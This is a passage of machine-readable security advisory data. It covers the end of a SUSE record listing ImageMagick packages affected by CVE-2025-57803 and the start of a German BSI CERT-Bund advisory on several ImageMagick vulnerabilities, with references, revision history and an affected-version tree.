"SUSE Linux Enterprise Server for SAP Applications 15 SP5:perl-PerlMagick-7.1.0.9-150400.6.40.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 8.5,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:ImageMagick-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:ImageMagick-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:ImageMagick-config-7-SUSE-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:ImageMagick-config-7-SUSE-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:ImageMagick-devel-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:ImageMagick-devel-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:libMagick++-7_Q16HDRI5-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:libMagick++-7_Q16HDRI5-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:libMagick++-devel-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:libMagick++-devel-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:libMagickCore-7_Q16HDRI10-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:libMagickCore-7_Q16HDRI10-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:libMagickWand-7_Q16HDRI10-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:libMagickWand-7_Q16HDRI10-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:perl-PerlMagick-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:perl-PerlMagick-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:ImageMagick-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:ImageMagick-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:ImageMagick-config-7-SUSE-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:ImageMagick-config-7-SUSE-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:ImageMagick-devel-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:ImageMagick-devel-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:libMagick++-7_Q16HDRI5-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:libMagick++-7_Q16HDRI5-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:libMagick++-devel-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:libMagick++-devel-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:libMagickCore-7_Q16HDRI10-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:libMagickCore-7_Q16HDRI10-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:libMagickWand-7_Q16HDRI10-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:libMagickWand-7_Q16HDRI10-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:perl-PerlMagick-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:perl-PerlMagick-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS:ImageMagick-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS:ImageMagick-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS:ImageMagick-config-7-SUSE-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS:ImageMagick-config-7-SUSE-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS:ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS:ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS:ImageMagick-devel-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS:ImageMagick-devel-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS:libMagick++-7_Q16HDRI5-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS:libMagick++-7_Q16HDRI5-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS:libMagick++-devel-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS:libMagick++-devel-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS:libMagickCore-7_Q16HDRI10-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS:libMagickCore-7_Q16HDRI10-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS:libMagickWand-7_Q16HDRI10-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS:libMagickWand-7_Q16HDRI10-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS:perl-PerlMagick-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS:perl-PerlMagick-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS:ImageMagick-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS:ImageMagick-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS:ImageMagick-config-7-SUSE-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS:ImageMagick-config-7-SUSE-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS:ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS:ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS:ImageMagick-devel-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS:ImageMagick-devel-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS:libMagick++-7_Q16HDRI5-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS:libMagick++-7_Q16HDRI5-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS:libMagick++-devel-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS:libMagick++-devel-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS:libMagickCore-7_Q16HDRI10-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS:libMagickCore-7_Q16HDRI10-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS:libMagickWand-7_Q16HDRI10-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS:libMagickWand-7_Q16HDRI10-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS:perl-PerlMagick-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS:perl-PerlMagick-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Module for Desktop Applications 15 SP6:ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise Module for Desktop Applications 15 SP6:ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Module for Desktop Applications 15 SP6:ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.s390x",
"SUSE Linux Enterprise Module for Desktop Applications 15 SP6:ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Module for Desktop Applications 15 SP7:ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise Module for Desktop Applications 15 SP7:ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Module for Desktop Applications 15 SP7:ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.s390x",
"SUSE Linux Enterprise Module for Desktop Applications 15 SP7:ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server 15 SP4-LTSS:ImageMagick-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise Server 15 SP4-LTSS:ImageMagick-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP4-LTSS:ImageMagick-7.1.0.9-150400.6.40.1.s390x",
"SUSE Linux Enterprise Server 15 SP4-LTSS:ImageMagick-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server 15 SP4-LTSS:ImageMagick-config-7-SUSE-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise Server 15 SP4-LTSS:ImageMagick-config-7-SUSE-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP4-LTSS:ImageMagick-config-7-SUSE-7.1.0.9-150400.6.40.1.s390x",
"SUSE Linux Enterprise Server 15 SP4-LTSS:ImageMagick-config-7-SUSE-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server 15 SP4-LTSS:ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise Server 15 SP4-LTSS:ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP4-LTSS:ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.s390x",
"SUSE Linux Enterprise Server 15 SP4-LTSS:ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server 15 SP4-LTSS:ImageMagick-devel-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise Server 15 SP4-LTSS:ImageMagick-devel-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP4-LTSS:ImageMagick-devel-7.1.0.9-150400.6.40.1.s390x",
"SUSE Linux Enterprise Server 15 SP4-LTSS:ImageMagick-devel-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server 15 SP4-LTSS:libMagick++-7_Q16HDRI5-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise Server 15 SP4-LTSS:libMagick++-7_Q16HDRI5-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP4-LTSS:libMagick++-7_Q16HDRI5-7.1.0.9-150400.6.40.1.s390x",
"SUSE Linux Enterprise Server 15 SP4-LTSS:libMagick++-7_Q16HDRI5-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server 15 SP4-LTSS:libMagick++-devel-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise Server 15 SP4-LTSS:libMagick++-devel-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP4-LTSS:libMagick++-devel-7.1.0.9-150400.6.40.1.s390x",
"SUSE Linux Enterprise Server 15 SP4-LTSS:libMagick++-devel-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server 15 SP4-LTSS:libMagickCore-7_Q16HDRI10-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise Server 15 SP4-LTSS:libMagickCore-7_Q16HDRI10-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP4-LTSS:libMagickCore-7_Q16HDRI10-7.1.0.9-150400.6.40.1.s390x",
"SUSE Linux Enterprise Server 15 SP4-LTSS:libMagickCore-7_Q16HDRI10-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server 15 SP4-LTSS:libMagickWand-7_Q16HDRI10-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise Server 15 SP4-LTSS:libMagickWand-7_Q16HDRI10-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP4-LTSS:libMagickWand-7_Q16HDRI10-7.1.0.9-150400.6.40.1.s390x",
"SUSE Linux Enterprise Server 15 SP4-LTSS:libMagickWand-7_Q16HDRI10-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server 15 SP4-LTSS:perl-PerlMagick-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise Server 15 SP4-LTSS:perl-PerlMagick-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP4-LTSS:perl-PerlMagick-7.1.0.9-150400.6.40.1.s390x",
"SUSE Linux Enterprise Server 15 SP4-LTSS:perl-PerlMagick-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server 15 SP5-LTSS:ImageMagick-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise Server 15 SP5-LTSS:ImageMagick-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP5-LTSS:ImageMagick-7.1.0.9-150400.6.40.1.s390x",
"SUSE Linux Enterprise Server 15 SP5-LTSS:ImageMagick-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server 15 SP5-LTSS:ImageMagick-config-7-SUSE-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise Server 15 SP5-LTSS:ImageMagick-config-7-SUSE-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP5-LTSS:ImageMagick-config-7-SUSE-7.1.0.9-150400.6.40.1.s390x",
"SUSE Linux Enterprise Server 15 SP5-LTSS:ImageMagick-config-7-SUSE-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server 15 SP5-LTSS:ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise Server 15 SP5-LTSS:ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP5-LTSS:ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.s390x",
"SUSE Linux Enterprise Server 15 SP5-LTSS:ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server 15 SP5-LTSS:ImageMagick-devel-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise Server 15 SP5-LTSS:ImageMagick-devel-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP5-LTSS:ImageMagick-devel-7.1.0.9-150400.6.40.1.s390x",
"SUSE Linux Enterprise Server 15 SP5-LTSS:ImageMagick-devel-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server 15 SP5-LTSS:libMagick++-7_Q16HDRI5-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise Server 15 SP5-LTSS:libMagick++-7_Q16HDRI5-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP5-LTSS:libMagick++-7_Q16HDRI5-7.1.0.9-150400.6.40.1.s390x",
"SUSE Linux Enterprise Server 15 SP5-LTSS:libMagick++-7_Q16HDRI5-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server 15 SP5-LTSS:libMagick++-devel-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise Server 15 SP5-LTSS:libMagick++-devel-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP5-LTSS:libMagick++-devel-7.1.0.9-150400.6.40.1.s390x",
"SUSE Linux Enterprise Server 15 SP5-LTSS:libMagick++-devel-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server 15 SP5-LTSS:libMagickCore-7_Q16HDRI10-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise Server 15 SP5-LTSS:libMagickCore-7_Q16HDRI10-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP5-LTSS:libMagickCore-7_Q16HDRI10-7.1.0.9-150400.6.40.1.s390x",
"SUSE Linux Enterprise Server 15 SP5-LTSS:libMagickCore-7_Q16HDRI10-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server 15 SP5-LTSS:libMagickWand-7_Q16HDRI10-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise Server 15 SP5-LTSS:libMagickWand-7_Q16HDRI10-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP5-LTSS:libMagickWand-7_Q16HDRI10-7.1.0.9-150400.6.40.1.s390x",
"SUSE Linux Enterprise Server 15 SP5-LTSS:libMagickWand-7_Q16HDRI10-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server 15 SP5-LTSS:perl-PerlMagick-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise Server 15 SP5-LTSS:perl-PerlMagick-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP5-LTSS:perl-PerlMagick-7.1.0.9-150400.6.40.1.s390x",
"SUSE Linux Enterprise Server 15 SP5-LTSS:perl-PerlMagick-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP4:ImageMagick-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP4:ImageMagick-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP4:ImageMagick-config-7-SUSE-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP4:ImageMagick-config-7-SUSE-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP4:ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP4:ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP4:ImageMagick-devel-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP4:ImageMagick-devel-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP4:libMagick++-7_Q16HDRI5-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP4:libMagick++-7_Q16HDRI5-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP4:libMagick++-devel-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP4:libMagick++-devel-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP4:libMagickCore-7_Q16HDRI10-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP4:libMagickCore-7_Q16HDRI10-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP4:libMagickWand-7_Q16HDRI10-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP4:libMagickWand-7_Q16HDRI10-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP4:perl-PerlMagick-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP4:perl-PerlMagick-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP5:ImageMagick-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP5:ImageMagick-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP5:ImageMagick-config-7-SUSE-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP5:ImageMagick-config-7-SUSE-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP5:ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP5:ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP5:ImageMagick-devel-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP5:ImageMagick-devel-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP5:libMagick++-7_Q16HDRI5-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP5:libMagick++-7_Q16HDRI5-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP5:libMagick++-devel-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP5:libMagick++-devel-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP5:libMagickCore-7_Q16HDRI10-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP5:libMagickCore-7_Q16HDRI10-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP5:libMagickWand-7_Q16HDRI10-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP5:libMagickWand-7_Q16HDRI10-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP5:perl-PerlMagick-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP5:perl-PerlMagick-7.1.0.9-150400.6.40.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2025-09-10T18:04:37Z",
"details": "important"
}
],
"title": "CVE-2025-57803"
}
]
}
wid-sec-w-2025-1906
Vulnerability from csaf_certbund
Notes
{
"document": {
"aggregate_severity": {
"text": "mittel"
},
"category": "csaf_base",
"csaf_version": "2.0",
"distribution": {
"tlp": {
"label": "WHITE",
"url": "https://www.first.org/tlp/"
}
},
"lang": "de-DE",
"notes": [
{
"category": "legal_disclaimer",
"text": "Das BSI ist als Anbieter f\u00fcr die eigenen, zur Nutzung bereitgestellten Inhalte nach den allgemeinen Gesetzen verantwortlich. Nutzerinnen und Nutzer sind jedoch daf\u00fcr verantwortlich, die Verwendung und/oder die Umsetzung der mit den Inhalten bereitgestellten Informationen sorgf\u00e4ltig im Einzelfall zu pr\u00fcfen."
},
{
"category": "description",
"text": "ImageMagick ist eine Sammlung von Programmbibliotheken und Werkzeugen, die Grafiken in zahlreichen Formaten verarbeiten kann.",
"title": "Produktbeschreibung"
},
{
"category": "summary",
"text": "Ein entfernter Angreifer kann mehrere Schwachstellen in ImageMagick ausnutzen, um einen Denial-of-Service-Zustand zu erzeugen, beliebigen Code auszuf\u00fchren, erweiterte Berechtigungen zu erlangen, vertrauliche Informationen offenzulegen und andere nicht n\u00e4her definierte Angriffe durchzuf\u00fchren.",
"title": "Angriff"
},
{
"category": "general",
"text": "- Sonstiges\n- UNIX\n- Windows",
"title": "Betroffene Betriebssysteme"
}
],
"publisher": {
"category": "other",
"contact_details": "csaf-provider@cert-bund.de",
"name": "Bundesamt f\u00fcr Sicherheit in der Informationstechnik",
"namespace": "https://www.bsi.bund.de"
},
"references": [
{
"category": "self",
"summary": "WID-SEC-W-2025-1906 - CSAF Version",
"url": "https://wid.cert-bund.de/.well-known/csaf/white/2025/wid-sec-w-2025-1906.json"
},
{
"category": "self",
"summary": "WID-SEC-2025-1906 - Portal Version",
"url": "https://wid.cert-bund.de/portal/wid/securityadvisory?name=WID-SEC-2025-1906"
},
{
"category": "external",
"summary": "GitHub Security Advisory GHSA-9ccg-6pjw-x645 vom 2025-08-25",
"url": "https://github.com/ImageMagick/ImageMagick/security/advisories/GHSA-9ccg-6pjw-x645"
},
{
"category": "external",
"summary": "GitHub Security Advisory GHSA-mxvv-97wh-cfmm vom 2025-08-25",
"url": "https://github.com/ImageMagick/ImageMagick/security/advisories/GHSA-fh55-q5pj-pxgw"
},
{
"category": "external",
"summary": "GitHub Security Advisory GHSA-mxvv-97wh-cfmm vom 2025-08-25",
"url": "https://github.com/ImageMagick/ImageMagick/security/advisories/GHSA-mxvv-97wh-cfmm"
},
{
"category": "external",
"summary": "openSUSE Security Update OPENSUSE-SU-2025:15498-1 vom 2025-08-29",
"url": "https://lists.opensuse.org/archives/list/security-announce@lists.opensuse.org/thread/XQFF5TXEMB2OGBITHJUT4QFUDCWE42M7/"
},
{
"category": "external",
"summary": "SUSE Security Update SUSE-SU-2025:03113-1 vom 2025-09-09",
"url": "https://lists.suse.com/pipermail/sle-security-updates/2025-September/022414.html"
}
],
"source_lang": "en-US",
"title": "ImageMagick: Mehrere Schwachstellen",
"tracking": {
"current_release_date": "2025-09-09T22:00:00.000+00:00",
"generator": {
"date": "2025-09-10T05:06:36.279+00:00",
"engine": {
"name": "BSI-WID",
"version": "1.4.0"
}
},
"id": "WID-SEC-W-2025-1906",
"initial_release_date": "2025-08-25T22:00:00.000+00:00",
"revision_history": [
{
"date": "2025-08-25T22:00:00.000+00:00",
"number": "1",
"summary": "Initiale Fassung"
},
{
"date": "2025-08-26T22:00:00.000+00:00",
"number": "2",
"summary": "Referenz(en) aufgenommen: EUVD-2025-25836, EUVD-2025-25837, EUVD-2025-25815"
},
{
"date": "2025-08-31T22:00:00.000+00:00",
"number": "3",
"summary": "Neue Updates von openSUSE aufgenommen"
},
{
"date": "2025-09-09T22:00:00.000+00:00",
"number": "4",
"summary": "Neue Updates von SUSE aufgenommen"
}
],
"status": "final",
"version": "4"
}
},
"product_tree": {
"branches": [
{
"branches": [
{
"branches": [
{
"category": "product_version_range",
"name": "\u003c7.1.2-2",
"product": {
"name": "Open Source ImageMagick \u003c7.1.2-2",
"product_id": "T046498"
}
},
{
"category": "product_version",
"name": "7.1.2-2",
"product": {
"name": "Open Source ImageMagick 7.1.2-2",
"product_id": "T046498-fixed",
"product_identification_helper": {
"cpe": "cpe:/a:imagemagick:imagemagick:7.1.2-2"
}
}
},
{
"category": "product_version_range",
"name": "\u003c6.9.13-28",
"product": {
"name": "Open Source ImageMagick \u003c6.9.13-28",
"product_id": "T046499"
}
},
{
"category": "product_version",
"name": "6.9.13-28",
"product": {
"name": "Open Source ImageMagick 6.9.13-28",
"product_id": "T046499-fixed",
